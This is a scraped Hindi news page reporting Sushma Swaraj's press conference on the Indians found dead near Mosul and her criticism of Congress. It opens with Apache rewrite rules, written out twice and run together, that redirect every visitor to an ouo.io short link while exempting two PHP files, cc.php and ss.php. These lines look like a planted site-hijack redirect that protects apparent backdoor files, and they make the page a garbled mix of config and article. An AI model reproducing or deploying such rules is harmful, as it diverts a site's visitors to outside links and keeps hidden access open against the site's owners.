
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 537
नई दिल्ली। इराक में भारतीयों की मौत पर लोकसभा में कांग्रेस की ओर से किए गए हंगामे के कारण बोलने नहीं दिए जाने से खफा विदेश मंत्री सुषमा स्वराज ने कांग्रेस को जमकर कोसा। आज शाम को एक प्रेस कॉन्फ्रेंस कर सुषमा ने कहा कि कांग्रेस अध्यक्ष राहुल गांधी ने जानबूझकर हंगामा किया है। कांग्रेस ओछी राजनीति कर रही है। उन्होंने कहा है कि लाशों के ढेर में भारतीयों का शव खोजा। उन्होंने कहा कि मैं पीडि़त परिवारों को धोखे में नहीं रखना चाहती थी। विदेशी मंत्री ने कहा है कि लापता भारतीयों को खोजने की पूरी कोशिश की, हमने बिना सबूत मृत घोषित नहीं किया। सुषमा ने कहा है कि लोगों का गुस्सा जायज है लेकिन मैंंने उन्हें अंधेरे में नहीं रखा। मैंंने हमेशा कहा कि सबूत नहीं है कि वे जीवत हैं या नहीं। मुझे तसल्ली है कि मैंने कहा था कि मैं तभी मृत घोषित करूंगी जब पक्का सबूत मिलेगा। उन्होंने कहा, मैं सभी मृतकों के अवशेष को उनके परिवार को सौंपूंगी जिससे वे सही तरीके से अंतिम संस्कार कर सकें। सुषमा स्वराज ने कहा, वे लोग कब मारे गए, इस बार में कुछ कहा नहीं जा सकता। लेकिन मोसुल की आजादी के बाद ही शवों की तलाश शुरू हुई।